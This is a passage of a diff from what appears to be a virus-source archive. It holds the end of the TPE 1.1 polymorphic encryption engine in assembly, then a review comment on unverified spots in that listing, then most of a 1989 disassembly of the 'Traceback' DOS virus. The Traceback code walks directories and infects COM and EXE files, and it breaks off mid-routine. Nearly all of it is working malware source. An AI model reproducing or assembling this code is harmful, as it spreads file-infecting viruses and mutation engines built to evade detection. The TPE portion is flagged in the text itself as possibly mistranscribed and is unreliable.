no_clc2 ;carry? + mov al,0f8h ;insert CLC + stosb + +no_clc2: + mov al,83h + stosb + mov al,0c0h + test bh,01 + je b0627f + mov al,0e8h ;insert XXX + +b0627f: + test bh,40h + je add2 + and al,0cfh + or al,10h + +add2: + call add_ind + stosb + mov al,01 + +save_it: + call add_1 + stosb + retn + +b06293: + test bh,01 + je do_cmpsw + mov al,0fdh ;add XXX + stosb + +do_cmpsw: + test bh,4 ;CMPSE or SCASW? + je normal_cmpsw + test bl,4 ;no SCASW if SI is used + jne do_scasw + +normal_cmpsw: + mov al,0a6h + jmp short save_it + +do_scasw: + mov al,0aeh + jmp short save_it + +;--- generate LOOP command -------------------------------- + +do_loop: + test bh,01 ;no JNE if counting down + jne do_loop2 + call rnd_get + test al,01 + jne cx_loop + +do_loop2: + mov al,0e0h ;LOOPNZ or LOOP? 
+ test bh,1ah ; no LOOPNZ if xor-offset + je l10 ; no LOOPNZ if CMP/SCASW + add al,2 + +l10: + stosb + mov ax,dx + sub ax,di + dec ax + stosb + retn + +cx_loop: + test bh,10h ;SUB CX or DEC CX? + jne cx1_dec + mov ax,0e983h + stosw + mov al,1 + stosb + jmp short do_jne + +cx1_dec: + mov al,49h + stosb + +do_jne: + mov al,75h + jmp short l10 + +;--- add value to AL depending on register type ----------- + +add_dir: + lea si,word ptr dir_change + jmp short xx1 + +add_ind: + lea si,word ptr ind_change + +xx1: + push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr [bx+si] + pop bx + retn + +;--- move encyryption command byte to AL ------------------ + +get_xor: + push bx + lea ax,word ptr how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + retn + +;--- change ADD to ADC ------------------------------------ + +do_carry: + test bl,2 ;ADD/SUB used for encryption + je no_ac + test bh,20h + je no_ac + and al,0cfh + or al,10h + +no_ac: + retn + +;--- change AL (byte/word) -------------------------------- + +add_1: + test bl,10h + je add_1_ret + inc al + +add_1_ret: + retn + +;--- change AL (byte/word) -------------------------------- + +maybe_2: + call add_1 ;can't touch this... 
+ cmp al,81h + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + je maybe_not + add al,2 + +maybe_not: + retn + +;--- insert random instructions --------------------------- + +do_nop: + test byte ptr ds: flags,2 + +yes_nop: + je no_nop + call rnd_get + test al,3 + je nop8 + test al,2 + je nop16 + +b0633b equ $+01h + test al,1 + je nop16x + +no_nop: + retn + +;--- insert random nop (or not) --------------------------- + +do_junk: + test byte ptr ds:flags,4 + je no_junk + call rnd_get ;put a random number of + and ax,0fh ; dummy instructions before + inc ax ; decryptor + xchg ax,cx + +junk_loop: + call junk + loop junk_loop + +no_junk: + retn + +junk: + call rnd_get + and ax,01eh + jmp short aa0 + +nop16x: + call rnd_get + and ax,6 + +aa0: + xchg ax,si + call rnd_get + jmp word ptr ds:junk_cals[si] + + +;----------------------------------------------------- + +junk_cals: + dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + +;----------------------------------------------------- + +nop16x0: + add byte ptr [si],cl ;J* 0000 (conditional) + jo yes_nop ;jump on overflow + retn + +nop16x1: + mov al,0ebh ;JMP xxxx/junk + and ah,7 + inc ah + stosw + xchg ah,al ;get length of bullshit + cbw ;convert AL to AX + jmp fill_bullshit + +nop16x2: + call junkD ;XCHG AX,reg/XCHG AX,reg + stosb + retn + +nop16x3: + call junkF ;INC/DEC or DEC/INC + xor al,8 + stosb + retn + +nop8: + push bx + and al,7 + lea bx,word ptr nop_data8 + xlat + stosb + pop bx + retn + +nop16: + push bx + and ax,0303h + lea bx,word ptr nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0c0h + stosb + pop bx + retn + +junk6: + push cx + mov al,0e8h + and ah,0fh ;CALL xxxx/junk/POP reg + inc ah + stosw + xor al,al + stosb 
+ xchg ah,al + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58h + stosb + test ch,3 ;more? + jne junk6_ret + call do_nop + mov ax,0f087h ;insert XCHG SI,reg + or ah,cl + test ch,8 + je j6_1 + mov al,8bh + +j6_1: + stosw + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0f7fbh ;insert XOR [SI],xxxx + or bl,8 + call do_xor + pop bx + +junk6_ret: + pop cx + retn + +junk7: + and al,0fh ;MOV reg,xxxx + or al,0b0h + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + +junk8: + and ah,39h ;DO r/m,r(8,16) + or al,0c0h + call no_sp + xchg ah,al + stosw + retn + +junk9: + and al,3bh ;DO r(8,16),r/m + or al,2 + and ah,3fh + call no_sp2 + call no_bp + stosw + retn + +junkA: + and ah,1 ;DO rm,xxxx + or ax,80c0h + call no_sp + xchg ah,al + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + +junkB: + call nop8 ;NOP/LOOP + mov ax,0fde2h + stosw + retn + +junkC: + and al,9 ;CMPS* or SCAS* + test ah,1 + je mov_test + or al,0a6h + stosb + retn + +mov_test: + or al,0a0h ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0a8h + pushf + call rnd_get + popf + jmp short byte_word + +junkD: + and al,7 ;XCHG AX,reg + or al,90h + call no_sp + stosb + retn + +junkE: + and ah,7 + or ah,50h + mov al,ah + or ah,8 + stosw + retn + +junkF: + and al,0fh ;INC/DEC + or al,40h + call no_sp + stosb + retn + +;--- store a byte or a word ------------------------------- + +byte_word: + je only_byte + stosw + retn + +only_byte: + stosb + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp: + push ax + and al,7 + cmp al,4 + pop ax + jne no_sp_ret + and al,0fbh + +no_sp_ret: + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp2: + push ax + and ah,38h + cmp ah,20h + pop ax + jne no_sp2_ret + xor ah,20h + +no_sp2_ret: + retn + +;--- don't use [bp + ..] 
---------------------------------- + +no_bp: + test ah,4 + jne no_bp2 + and ah,0fdh + retn + +no_bp2: + push ax + and ah,7 + cmp ah,6 + pop ax + jne no_bp_ret + or ah,1 + +no_bp_ret: + retn + +;--- write byte for JMP/CAL and fill with random bullshit - + +fill_bullshit: + push cx + xchg ax,cx + +bull_lup: + call rnd_get + stosb + loop bull_lup + pop cx + retn + +;--- random number generator ------------------------------ + +rnd_init: + push ax + push cx + call random_init0 + and ax,0h + inc ax + xchg ax,cx + +random_lup: + call rnd_get ;cal random routine a few + loop random_lup ; times to 'warm up' + pop cx + pop ax + retn + +random_init0: + push dx ;initialize generator + push cx + mov ah,2ch + int 21h ;get time CH,CL:DH,DL + in al,40h ;timer + mov ah,al + in al,40h ;timer + xor ax,cx + xor dx,ax + jmp short mov_rnd + +rnd_get: + push dx ;calculate random number + push cx + push bx + in al,40h + +d06502 equ $+01h + add ax,0000h + +d06505 equ $+01h + mov dx,0000h + mov cx,0007h + +rnd_lup: + shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_12 + inc al + +rnd_12: + loop rnd_lup + pop bx + +mov_rnd: + mov word ptr cs:d06502,ax + mov word ptr cs:d06505,dx + mov al,dl + pop cx + pop dx + retn + +;----------------------------------------------------- +;.data + +mov_byte db 0b8,0b0,0b4,00 ;AX,AL,AH,.. + db 0b8,0b3,0b7,00 ;BX,GL,GH,.. + db 0b9,0b1,0b5 ;CX,CL,CH + +nop_data8 db 90,0f8,0f9,0f5 ;NOP,CLC,STC,CMC + db 0fa,0fc,45,4dh ;CLI,CLD,INC BP,DEC BP + +nop_data16 db 08,20,84,88 ;OR,AND,XCHG,MOV + +dir_change db 07,07,04,05 ;BL/BH,BX,SI,DI + +ind_change db 03,03,06,07 ;BL/BH,BX,SI,DI + +how_mode db 30,30,00,28 ;XOR,XOR,ADD,SUB + +alt_code dw 0c800h,0c0f0h ;ADD AL,CL,???? + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +store_mov db 0 +flags db 0 + + db '[TPE 1.1]' + +tpe_bottom equ $ + + end tpe_top + 
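Review bot: In rnd_init, `and ax,0h` followed by `inc ax` fixes cx at 1, so the loop commented as calling the random routine "a few times to 'warm up'" runs exactly once; the preceding listing (ID string '[TPE 1.1]' vs '[TPE 1.3]') has `and ax,000fh` at the same spot, so this is either a genuine v1.1 difference or a transcription slip, and the file does not say which. The `;????` on `call dword ptr ds:[5652h]` at the top of `crypt` is a second unresolved spot, and the commit adds the file with no statement of whether the disassembly was ever re-assembled or checked against a binary. Since this archive exists for researchers to compare variants, a provenance line under the existing banner would make the listing's status explicit, e.g. `; NOTE: unverified disassembly - open questions at the ;???? call in crypt and the rnd_init mask; not checked by re-assembly`.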
diff --git a/MSDOS/Virus.MSDOS.Unknown.tracebck.asm b/MSDOS/Virus.MSDOS.Unknown.tracebck.asm new file mode 100644 index 00000000..86461293 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tracebck.asm 
@@ -0,0 +1,1303 @@ + page 65,132 + title The 'Traceback' Virus +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The 'Traceback' Virus +; Disassembled by Joe Hirst, June 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +BOOT SEGMENT AT 0 + + ORG 24H +BW0024 DW ? ; Int 9 offset +BW0026 DW ? ; Int 9 segment + + ORG 70H +BW0070 DW ? ; Int 1CH offset +BW0072 DW ? ; Int 1CH segment + + ORG 80H +BD0080 EQU THIS DWORD +BW0080 DW ? ; Int 20H offset +BW0082 DW ? ; Int 20H segment +BW0084 DW ? ; Int 21H offset +BW0086 DW ? ; Int 21H segment + + ORG 90H +BW0090 DW ? ; Int 24H offset +BW0092 DW ? ; Int 24H segment + + ORG 9CH +BD009C EQU THIS DWORD +BW009C DW ? ; Int 27H offset +BW009E DW ? ; Int 27H segment + + ORG 449H +BB0449 DB ? 
; Current VDU mode + +BOOT ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:CODE + +DW0000 DW 02EEBH ; \ Stored start of host program +DB0002 DB 090H ; / +DB0003 DB 0FFH +DB0004 DB 0FBH ; Infection countdown +DD0005 EQU THIS DWORD +DW0005 DW 100H +DW0007 DW 0CBBH +DW0009 DW 4DH +DB000B DB 0, 0 +DB000D DB 0EBH, 2EH, 90H, 0FFH, 0FFH, 6CH, 6CH +DB0014 DB 'o - Copyright S & S E', 29 DUP (0) +CURDIR DB 0, 'PLIC', 60 DUP (0) ; Current directory +DTAFLE DB 3, '????????COM ', 2, 0, 0, 0, 'c:\m ' + DB 1AH, 0, 0AFH, 0AH, 95H, 58H, 0, 0 + DB 'COMMAND.COM', 3 DUP (0) +DTADIR DB 1, '???????????', 10H, 5, 7 DUP (0) + DB 20H, 0E9H, 11H, 0B5H, 12H, 0F6H, 48H, 2, 0 + DB 'CAT-TWO.ARC', 0, 0, 0 +DB00DF DB 0 +SEGREG DW 0AEBH +PTHDSK DB 2 ; Pathname drive +CURDSK DB 2 ; Current disk +ATTR_F DW 0020H ; File attributes +TIME_F DW 22B6H ; File time +DATE_F DW 1174H ; File date +I24_OF DW 04EBH ; Old Int 24H offset +I24_SG DW 0A17H ; Old Int 24H segment +CRTERR DB 0 ; Critical error flag +F_HAND DW 0 ; File handle +F_TIME DW 5951H ; File time +F_DATE DW 0F8BH ; File date +F_ATTR DW 0020H ; File attributes +V_SIGN DB 056H, 047H, 031H ; Virus signature + + ; Entry point + +BP0010: JMP SHORT BP0020 + + DW SIGNAT + +BP0020: CALL BP0640 ; Get relocation constant in SI + CALL BP0600 ; Set Int 24H vector + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV PTH_OF[SI],SI ; \ Address of pathname + ADD PTH_OF[SI],OFFSET DB0884 ; / + MOV PTH_SG[SI],CS ; Segment of pathname + MOV CURDSK[SI],AL ; Save current disk + CALL BP0510 ; Get installed virus segment + MOV DL,PTHDSK[DI] ; Get pathname drive in installed virus + MOV AX,DS ; Get segment in installed virus + PUSH CS ; \ Set DS to CS + POP DS ; / + JNZ BP0030 ; Branch if not installed + MOV PTH_OF[SI],OFFSET DB0884+100H ; Pathname in installed virus + MOV PTH_SG[SI],AX ; Segment in installed virus + CMP DL,0FFH ; Is there a pathname drive? 
+ JE BP0030 ; Branch if not + MOV AH,0EH ; Select disk function + INT 21H ; DOS service +BP0030: MOV BYTE PTR SWTCHB[SI],80H ; Set on switch eight + MOV F_HAND[SI],0 ; Clear file handle + MOV AH,2AH ; Get date function + INT 21H ; DOS service + CMP CX,07C4H ; Is year 1988? + JGE BP0040 ; Branch if not before + JMP SHORT BP0070 + +PTH_OF DW 0F8CH ; Offset of pathname +PTH_SG DW 0AEBH ; Segment of pathname +ISWTCH DB 0 ; Infected file switch + + ; 1988 or later + +BP0040: JG BP0050 ; Branch if after 1988 + CMP DH,0CH ; Is month December? + JL BP0070 ; Branch if not + CMP DL,5 ; 5th of December? + JL BP0070 ; Branch if before + CMP DL,1CH ; 28th of December? + JL BP0060 ; Branch if before +BP0050: MOV DSPCNT[SI],0FFDCH ; Start display count (60 mins) + MOV BYTE PTR SWTCHB[SI],88H ; Switches four & eight +BP0060: CMP DB0004[SI],0F8H ; Has infection count reached target? + JNB BP0080 ; Branch if not + ASSUME DS:NOTHING +BP0070: MOV CRTERR[SI],0 ; Clear critical error flag + JMP BP0270 + + ; Unreachable code + + ASSUME DS:CODE + CMP DB0004[SI],0F8H ; Has infection count reached target? 
+ JNB BP0080 ; Branch if not + OR BYTE PTR SWTCHB[SI],4 ; Set on switch three + +BP0080: MOV DB00DF[SI],0 ; Set not-first-time switch off + MOV DX,PTH_OF[SI] ; Get pathname offset + MOV DS,PTH_SG[SI] ; Get pathname segment + MOV AX,4300H ; Get attributes function + CALL BP0230 ; Perform a DOS service + JB BP0090 ; Branch if error + ASSUME DS:NOTHING + MOV F_ATTR[SI],CX ; Save file attributes + AND CL,0FEH ; Switch off read-only + MOV AX,4301H ; Set attributes function + CALL BP0230 ; Perform a DOS service + JB BP0090 ; Branch if error + MOV AX,3D02H ; Open handle R/W function + INT 21H ; DOS service + JB BP0090 ; Branch if error + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV F_HAND[SI],AX ; Save file handle + MOV BX,AX ; Move file handle + MOV AX,5700H ; Get file date and time function + INT 21H ; DOS service + MOV F_TIME[SI],CX ; Save file time + MOV F_DATE[SI],DX ; Save file date + DEC DB0004[SI] ; Decrement infection count + MOV DX,FLENLO[SI] ; Get file length, low word + MOV CX,FLENHI[SI] ; Get file length, high word + ADD DX,OFFSET DB0004 ; \ Add to length + ADC CX,0 ; / + MOV AX,4200H ; Move file pointer (start) function + INT 21H ; DOS service +BP0090: PUSH CS ; \ Set DS to CS + POP DS ; / + TEST BYTE PTR SWTCHB[SI],4 ; Test switch three + JZ BP0100 ; Branch if off + CALL BP0330 ; Write infection count + JMP BP0270 + + ; Change directory to root + +BP0100: XOR DL,DL ; Default drive + MOV AH,47H ; Get current directory function + PUSH SI + ADD SI,46H ; Address directory store + INT 21H ; DOS service + POP SI + CMP CRTERR[SI],0 ; Test critical error flag + JNE BP0110 ; Branch if set + CALL BP0250 ; Make root dir current dir + JNB BP0120 ; Branch if no error +BP0110: JMP BP0070 + + ; Find COM files + +BP0120: MOV DX,SI ; \ Address DTA area + ADD DX,OFFSET DTAFLE ; / + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service + MOV [SI+5],'.*' ; \ + MOV [SI+7],'OC' ; ) '*.COM' + MOV WORD PTR [SI+9],'M' ; / + MOV AH,4EH ; Find first file function + 
MOV DX,SI ; \ Address file spec + ADD DX,5 ; / +BP0130: MOV CX,0020H ; Attributes - archive + CALL BP0230 ; Perform a DOS service + JB BP0160 ; Move on to EXE files + MOV DX,SI ; \ Address filename in DTA + ADD DX,OFFSET DTAFLE+1EH ; / + MOV ISWTCH[SI],0 ; Set infected file switch off + CALL BP0350 ; Process file + JB BP0150 ; Error or infected file found + CALL BP0330 ; Write infection count +BP0140: JMP BP0260 + +BP0150: CMP CRTERR[SI],0 ; Test critical error flag + JNE BP0140 ; Branch if set + CMP ISWTCH[SI],0 ; Test infected file switch + JNE BP0200 ; Branch if on + MOV AH,4FH ; Find next file function + JMP BP0130 + + ; Find EXE files + +BP0160: MOV [SI+7],'XE' ; \ '*.EXE' + MOV WORD PTR [SI+9],'E' ; / + MOV AH,4EH ; Find first file function + MOV DX,SI ; \ Address file spec + ADD DX,5 ; / +BP0170: MOV CX,0020H ; Attributes - archive + CALL BP0230 ; Perform a DOS service + JB BP0200 ; No more files + MOV DX,SI ; \ Address filename in DTA + ADD DX,OFFSET DTAFLE+1EH ; / + MOV ISWTCH[SI],0 ; Set infected file switch off + CALL BP0350 ; Process file + JB BP0190 ; Error or infected file found + CALL BP0330 ; Write infection count +BP0180: JMP BP0260 + + ASSUME DS:NOTHING +BP0190: CMP CRTERR[SI],0 ; Test critical error flag + JNE BP0180 ; Branch if set + ASSUME DS:CODE + CMP ISWTCH[SI],0 ; Test infected file switch + JNE BP0200 ; Branch if on + MOV AH,4FH ; Find next file function + JMP BP0170 + +BP0200: CALL BP0250 ; Make root dir current dir + MOV DX,SI ; \ Address 2nd DTA + ADD DX,OFFSET DTADIR ; / + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service +BP0210: MOV AH,4FH ; Find next file function + MOV CX,0010H ; Find directories + CMP DB00DF[SI],0 ; First time? 
+ JNE BP0220 ; Branch if not + MOV DB00DF[SI],1 ; Set not-first-time switch + MOV [SI+5],'.*' ; \ '*.*' + MOV WORD PTR [SI+7],'*' ; / + MOV AH,4EH ; Find first file function + MOV DX,SI ; \ Address file spec + ADD DX,5 ; / +BP0220: CALL BP0230 ; Perform a DOS service + JB BP0260 ; No more files + TEST DTADIR[SI+15H],10H ; Is it a directory? + JZ BP0210 ; Branch if not + MOV DX,SI ; \ Address file name in DTA + ADD DX,OFFSET DTADIR+1EH ; / + MOV AH,3BH ; Change current directory function + CALL BP0230 ; Perform a DOS service + JB BP0260 ; Branch if error + JMP BP0120 ; Look for COM files + + ; Perform a DOS service + +BP0230: INT 21H ; DOS service + JB BP0240 ; Branch if error + ASSUME DS:NOTHING + TEST CRTERR[SI],0FFH ; Test critical error flag + JZ BP0240 ; Branch if not set + STC +BP0240: RET + + ; Make root dir current dir + +BP0250: MOV WORD PTR [SI+5],'\' ; Root dir + MOV DX,SI ; \ Address root dir pathname + ADD DX,5 ; / + MOV AH,3BH ; Change current directory function + CALL BP0230 ; Perform a DOS service + RET + + ASSUME DS:CODE +BP0260: CALL BP0250 ; Make root dir current dir + MOV DX,SI ; \ Address + ADD DX,46H ; / + MOV AH,3BH ; Change current directory function + INT 21H ; DOS service +BP0270: MOV BX,F_HAND[SI] ; Get file handle + OR BX,BX ; Test for a handle + JZ BP0290 ; Branch if none + MOV CX,F_ATTR[SI] ; Get file attributes + MOV DX,PTH_OF[SI] ; Get pathname offset + MOV DS,PTH_SG[SI] ; Get pathname segment + CMP CX,20H ; Are attributes archive? + JE BP0280 ; Branch if yes + MOV AX,4301H ; Set attributes function + INT 21H ; DOS service +BP0280: PUSH CS ; \ Set DS to CS + POP DS ; / + MOV CX,F_TIME[SI] ; Get file time + MOV DX,F_DATE[SI] ; Get file date + MOV AX,5701H ; Set file date and time function + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service +BP0290: MOV DL,CURDSK[SI] ; Get current disk + MOV AH,0EH ; Select disk function + INT 21H ; DOS service + CALL BP0610 ; Restore Int 24H vector + POP AX ; ? 
+ MOV SEGREG[SI],AX ; Save segment + CMP BYTE PTR [SI+3],0FFH ; Should virus be installed? + JE BP0300 ; Branch if yes + ADD AX,0010H ; Add PSP length to segment + ADD WORD PTR [SI+2],AX ; Store segment + POP AX ; ? + POP DS ; ? + JMP DWORD PTR CS:[SI] ; Branch to ? + + ; Install resident copy of virus + +BP0300: CALL BP0510 ; Get installed virus segment + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV AX,[SI] ; \ Replace first word of host + MOV DW0000+100H,AX ; / + MOV AL,[SI+2] ; \ Replace third byte of host + MOV DB0002+100H,AL ; / + JZ BP0310 ; Branch if installed + MOV BX,DS ; Get current segment + ADD BX,01D0H ; Add length of installed segment + MOV ES,BX ; Segment to copy to + MOV DI,SI ; Start of virus + MOV DX,SI ; Copy relocation factor + MOV CX,OFFSET ENDADR ; Length of virus + CALL BP1160 ; Copy virus and transfer control + MOV CX,DX ; Relocation factor (as length) + MOV SI,DX ; Relocation factor as source + DEC SI ; Back one byte + MOV DI,SI ; Same offset as target + STD ; Going backwards + REPZ MOVSB ; Copy host program + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV DI,0100H ; Target following PSP + MOV DS,BX ; Current segment as source + MOV SI,DX ; Start of virus + MOV CX,OFFSET ENDADR ; Length of virus + CALL BP1160 ; Copy virus and transfer control + MOV SI,0100H ; New relocation factor + PUSH CS ; \ Set DS to CS + POP DS ; / + CALL BP0580 ; Install interrupts + MOV DX,01D0H ; Get length of installed segment +BP0310: MOV DI,CS ; \ New segment for host + ADD DI,DX ; / + MOV WORD PTR [SI+5],0100H ; Host offset + MOV [SI+7],DI ; Host segment + POP AX ; ? + POP DS ; ? 
+ MOV DS,DI ; \ + MOV ES,DI ; ) Set up other segment registers + MOV SS,DI ; / + XOR BX,BX ; Clear register + XOR CX,CX ; Clear register + XOR BP,BP ; Clear register + JMP DWORD PTR CS:[SI+5] ; Branch to host program + + ; Clear error flag and return + + ASSUME DS:NOTHING +BP0320: MOV CRTERR[SI],0 ; Clear critical error flag + RET + + ; Write infection count + + ASSUME DS:CODE +BP0330: MOV BX,F_HAND[SI] ; Get file handle + OR BX,BX ; Test for a handle + JZ BP0340 ; Branch if none + MOV DX,SI ; \ Address infection count + ADD DX,OFFSET DB0004 ; / + MOV CX,1 ; Length to write + MOV AH,40H ; Write handle function + INT 21H ; DOS service +BP0340: RET + + ; Process file + +BP0350: PUSH DX + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + ADD AL,'A' ; Convert to letter + MOV AH,':' ; Disk separator + MOV WORD PTR DB0884[SI],AX ; Disk in pathname + MOV BYTE PTR DB0884[SI+2],'\' ; Root directory in pathname + PUSH SI + ADD SI,OFFSET DB0884+3 ; Address next position in pathname + MOV AH,47H ; Get current directory function + MOV DI,SI ; Buffer area + XOR DL,DL ; Default drive + INT 21H ; DOS service + POP SI + DEC DI ; Back one character +BP0360: INC DI ; Next character + MOV AL,[DI] ; Get character + OR AL,AL ; Is it zero + JNZ BP0360 ; Branch if not + POP BX + MOV BYTE PTR [DI],'\' ; Store directory separator + INC DI ; Next position + MOV DX,BX ; Copy filename pointer +BP0370: MOV AL,[BX] ; Get character + MOV [DI],AL ; Store in pathname + INC BX ; Next input position + INC DI ; Next output position + OR AL,AL ; End of filename? 
+ JNZ BP0370 ; Next character if not +BP0380: MOV AX,4300H ; Get attributes function + CALL BP0230 ; Perform a DOS service + JB BP0320 ; Branch if error + ASSUME DS:NOTHING + MOV ATTR_F[SI],CX ; Save attributes + AND CX,00FEH ; Set off read only + MOV AX,4301H ; Set attributes function + CALL BP0230 ; Perform a DOS service + JB BP0320 ; Branch if error + MOV AX,3D02H ; Open handle R/W function + CALL BP0230 ; Perform a DOS service + JB BP0320 ; Branch if error + MOV BX,AX ; Move handle + PUSH DS + PUSH DX + CALL BP0400 ; Infect file if not infected + POP DX + POP DS + PUSHF + MOV CX,ATTR_F[SI] ; Get attributes + CMP CX,20H ; Archive only? + JE BP0390 ; Branch if yes + MOV AX,4301H ; Set attributes function + INT 21H ; DOS service +BP0390: MOV CX,TIME_F[SI] ; Get file time + MOV DX,DATE_F[SI] ; Get file date + MOV AX,5701H ; Set file date and time function + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + POPF + RET + + ; Infect file if not infected + +BP0400: MOV AX,5700H ; Get file date and time function + INT 21H ; DOS service + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV TIME_F[SI],CX ; Save file time + MOV DATE_F[SI],DX ; Save file date + MOV DX,SI ; \ Address buffer + ADD DX,0DH ; / + MOV DI,DX ; Copy this address + MOV AH,3FH ; Read handle function + MOV CX,001CH ; EXE header length + INT 21H ; DOS service + CMP WORD PTR [DI],'ZM' ; EXE header? + JE BP0430 ; Branch if yes + CALL BP0500 ; Move pointer to end of file + ADD AX,OFFSET SIGNAT+100H ; Add length of virus + JB BP0410 ; Branch if too big for a COM + CMP BYTE PTR [DI],0E9H ; Does it start with a near jump? 
+ JNE BP0420 ; Branch if not + MOV DX,[DI+1] ; Get displacement from jump + XOR CX,CX ; Clear top + MOV AX,4200H ; Move file pointer (start) function + INT 21H ; DOS service + MOV DX,DI ; Read buffer + ADD DX,001CH ; Add length of EXE header + MOV AH,3FH ; Read handle function + MOV CX,3 ; Length to read + INT 21H ; DOS service + CALL BP0440 ; Test virus signature on file + JNB BP0420 ; Branch if not present + ASSUME DS:NOTHING + MOV ISWTCH[SI],1 ; Set infected file switch on +BP0410: RET + + ASSUME DS:CODE +BP0420: CALL BP0500 ; Move pointer to end of file + MOV FLENLO[SI],AX ; Save file length, low word + MOV FLENHI[SI],DX ; Save file length, high word + PUSH AX + MOV WORD PTR [DI+3],0FFFFH ; Initialise count + MOV CX,5 ; Length to write + MOV AH,40H ; Write handle function + MOV DX,DI ; Address start of buffer + INT 21H ; DOS service + MOV DX,SI ; \ Address start of virus + ADD DX,5 ; / + MOV CX,OFFSET SIGNAT ; Length of virus + MOV AH,40H ; Write handle function + INT 21H ; DOS service + MOV AX,4200H ; Move file pointer (start) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + MOV BYTE PTR [DI],0E9H ; Near jump instruction + POP AX ; Recover length of file + ADD AX,OFFSET BP0010-3 ; Jump offset to entry point + MOV [DI+1],AX ; Store in jump instruction + MOV DX,DI ; Address of jump instruction + MOV CX,3 ; Length to write + MOV AH,40H ; Write handle function + INT 21H ; DOS service + CLC + RET + + ; EXE file + +BP0430: CMP WORD PTR [DI+0CH],0FFFFH ; Is max alloc asking for maximum? 
+ JNE BP0450 ; Branch if not + PUSH SI + MOV SI,[DI+14H] ; Get initial offset + MOV CX,[DI+16H] ; Get initial segment + MOV AX,CX ; Copy segment + MOV CL,CH ; Move top byte down + XOR CH,CH ; Clear top + SHR CX,1 ; \ + SHR CX,1 ; \ Move top nibble into position + SHR CX,1 ; / + SHR CX,1 ; / + SHL AX,1 ; \ + SHL AX,1 ; \ Move rest of segment + SHL AX,1 ; / + SHL AX,1 ; / + ADD SI,AX ; \ Add to offset + ADC CX,0 ; / + SUB SI,3 ; \ Subtract length of signature + SBB CX,0 ; / + MOV AX,[DI+8] ; Get size of header + CALL BP0490 ; Move segment to two-register offset + ADD SI,AX ; \ Add to starting position + ADC CX,DX ; / + MOV DX,SI ; Move low word + POP SI + MOV AX,4200H ; Move file pointer (start) function + INT 21H ; DOS service + MOV DX,DI ; Address buffer + ADD DX,001CH ; Add length of EXE header + MOV AH,3FH ; Read handle function + MOV CX,3 ; Length to read + INT 21H ; DOS service + CALL BP0440 ; Test virus signature on file + JNB BP0480 ; Branch if not present + ASSUME DS:NOTHING + MOV ISWTCH[SI],1 ; Set infected file switch on + RET + + ; Test virus signature on file + +BP0440: CMP WORD PTR [DI+1CH],4756H ; Look for virus signature + JNE BP0470 ; Branch if not found + CMP BYTE PTR [DI+1EH],31H ; Look for rest of signature + JNE BP0470 ; Branch if not found +BP0450: STC +BP0460: RET + +BP0470: CLC + RET + + ; Infect EXE file + + ASSUME DS:CODE +BP0480: CALL BP0500 ; Move pointer to end of file + MOV FLENLO[SI],AX ; Save file length, low word + MOV FLENHI[SI],DX ; Save file length, high word + MOV CX,[DI+4] ; Get size of file in pages + SHL CX,1 ; Multiply by two + XCHG CH,CL ; Reverse bytes + MOV BP,CX ; Copy + AND BP,0FF00H ; Convert to bytes (low word) + XOR CH,CH ; Convert to bytes (high word) + ADD BP,[DI+6] ; \ Add number of relocation entries + ADC CX,0 ; / + SUB BP,AX ; \ Subtract current length + SBB CX,DX ; / + JB BP0460 ; Branch if overlay + PUSH AX ; Save length of host, low word + PUSH DX ; Save length of host, high word + PUSH [DI+18H] ; Save offset 
to relocation table + MOV BYTE PTR [DI+18H],0FFH ; Original entry address marker + MOV CX,5 ; Length to write + MOV AH,40H ; Write handle function + MOV DX,DI ; \ Address host entry address + ADD DX,14H ; / + INT 21H ; DOS service + POP [DI+18H] ; Recover offset to relocation table + MOV DX,SI ; \ Address start of virus + ADD DX,5 ; / + MOV CX,OFFSET SIGNAT ; Length of virus + MOV AH,40H ; Write handle function + INT 21H ; DOS service + MOV AX,4200H ; Move file pointer (start) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + POP [DI+16H] ; Recover length of host, high word + POP [DI+14H] ; Recover length of host, low word + ADD WORD PTR [DI+14H],00FAH ; \ Add entry point + ADC WORD PTR [DI+16H],0 ; / + MOV AX,[DI+8] ; Get size of header + CALL BP0490 ; Move segment to two-register offset + SUB [DI+14H],AX ; \ Subtract size of header + SBB [DI+16H],DX ; / + MOV CL,0CH ; Bits to move + SHL WORD PTR [DI+16H],CL ; Convert high word to segment + 